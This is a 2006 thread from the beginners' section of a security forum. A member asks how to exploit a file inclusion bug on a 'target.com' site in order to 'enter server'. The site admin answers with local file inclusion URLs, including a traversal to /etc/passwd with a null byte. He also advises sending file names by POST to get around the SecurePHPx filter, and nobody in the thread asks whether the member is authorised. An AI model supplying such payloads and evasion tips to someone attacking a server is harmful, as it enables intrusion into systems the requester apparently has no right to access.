 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 45
 Members: 0
 Total: 45
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Security Test |
|
 Posted: Wed May 10, 2006 4:12 pm |
 |
|
| TapDunk |
| Beginner |
 |
|
| Joined: Apr 30, 2006 |
| Posts: 4 |
|
|
|
 |
|
 |
|
Testing the security of a target website. If target.com has exploit where request is not validated how can I defeat with remote file inclusion. Is there a tool available that does that.
Example:
http://target.com/index.php?mod= is susceptible to multiple injections. That returns this error.
| Quote: | Warning: main(extensions/.php): failed to open stream: No such file or directory in /home/username/public_html/index.php on line 156
Warning: main(extensions/.php): failed to open stream: No such file or directory in /home/username/public_html/index.php on line 156
Warning: main(): Failed opening 'extensions/.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/username/public_html/index.php on line 156 |
How can I enter server with such an exploit? Open to suggestions. |
|
|
|
|
|
|
|
|
| Posted: Wed May 10, 2006 4:22 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This seems to be potential local file inclusion bug.
Try for example:
| Code: |
http://target.com/index.php?mod=../index
http://target.com/index.php?mod=../../../../../../../../../../../../etc/passwd%00
|
and check "extensions" directory for possible listing:
| Code: |
http://target.com/extensions/
|
|
|
|
|
|
| Posted: Wed May 10, 2006 5:31 pm |
|
|
| TapDunk |
| Beginner |
|
|
| Joined: Apr 30, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
Ok thanx for that. Server protected by SecurePHPx. Script blocked to prevent further abuse or action.
How did I get around that? |
|
|
|
|
| Posted: Wed May 10, 2006 5:41 pm |
|
|
| TapDunk |
| Beginner |
|
|
| Joined: Apr 30, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
When I try the first injection I get this err tho.
| Quote: | | Fatal error: Cannot redeclare rendertable_interface() (previously declared in /home/username/public_html/ADMIN/Utils.php:90) in /home/username/public_html/ADMIN/Utils.php on line 89 |
|
|
|
|
|
|
|
|
|
| Posted: Wed May 10, 2006 8:37 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| TapDunk wrote: | When I try the first injection I get this err tho.
| Quote: | | Fatal error: Cannot redeclare rendertable_interface() (previously declared in /home/username/public_html/ADMIN/Utils.php:90) in /home/username/public_html/ADMIN/Utils.php on line 89 |
|
You see - new pieces of information are popping up 
This type of bug is not very easy to exploit. It all depends on software environment and other factors.
There are lots of various advisories about local file inclusion bugs:
http://www.google.com/search?hl=en&lr=&q=php+local+file+inclusion&btnG=Search
I suggest to try to include different files, analize error messages, try to determine software platform and if it's opensource, download source code and search for bugs. Determine, if "magic_quotes" is on or off. If it's off, then "poison null" should work and because that stupid "SecurePHPx" is filtering GET requests, use POST operation to deliver file names. |
|
|
|
|
|
|
|
|
| Posted: Wed May 10, 2006 8:45 pm |
|
|
| TapDunk |
| Beginner |
|
|
| Joined: Apr 30, 2006 |
| Posts: 4 |
|
|
|
|
|
|
|
ok thnx man  |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
